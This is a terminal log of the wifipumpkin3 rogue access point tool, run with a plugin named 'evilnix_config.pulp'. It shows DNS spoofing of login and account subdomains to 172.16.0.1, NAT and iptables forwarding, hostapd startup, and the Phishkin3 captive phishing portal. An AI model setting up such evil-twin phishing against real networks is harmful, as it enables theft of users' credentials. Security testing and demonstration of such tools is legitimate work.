λ mh4x0f [~/scripts] $ sudo wp3 -p evilnix_config.pulp
_ ___ _____ ___ __ _ ____
| | /| / (_) __(_)___/ _ \__ ____ _ ___ / /__ (_)__ |_ /
| |/ |/ / / _// /___/ ___/ // / ' \/ _ \/ '_// / _ \_/_ <
|__/|__/_/_/ /_/ /_/ \_,_/_/_/_/ .__/_/\_\/_/_//_/____/
/_/
codename: Gao
by: @mh4x0f - P0cL4bs Team | version: 1.1.7 main
[*] Session id: 9794816e-eb6c-11ee-a7e5-fd5405389990
[*] mode: script
[*] plugin: evilnix_config.pulp
===============================
[*] DnsSpoof attack
===================
[*] Redirect to: 172.16.0.1
[*] Targets:
============
[*] -> [login.yourfakedomain.com]
[*] -> [account.yourfakedomain.com]
[*] -> [*.yourfakedomain.com]
[*] module: dns_spoof running in background
[*] use jobs command displays the status of jobs started
[+] enable forwarding in iptables...
[*] sharing internet connection with NAT...
[*] setting interface for sharing internet: wlp0s20f3
[*] settings for Phishkin3 portal:
[*] allow FORWARD UDP DNS
[*] allow traffic to Phishkin3 captive portal
[*] block all other traffic in access point
[*] redirecting HTTP traffic to captive portal
[+] starting hostpad pid: [84107]
wp3 > [+] hostapd is running
...
[ pydns_server ] 09:30:17 - 11: login.yourfakedomain.com. 300 IN A 172.16.0.1
[ pydns_server ] 09:30:18 - 12: account.yourfakedomain.com. 300 IN A 172.16.0.1
[ pydns_server ] 09:30:18 - 13: *.yourfakedomain.com. 300 IN A 172.16.0.1
[ pydns_server ] 09:30:18 - 13 zone resource records generated from zone file
[ phishkin3 ] 09:30:18 - [*] phishkin3 v1.0.2 - subtool from wifipumpkin3
* Serving Flask app 'wifipumpkin3.plugins.bin.phishkin3'
* Debug mode: off
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
* Running on http://172.16.0.1:8080
Press CTRL+C to quit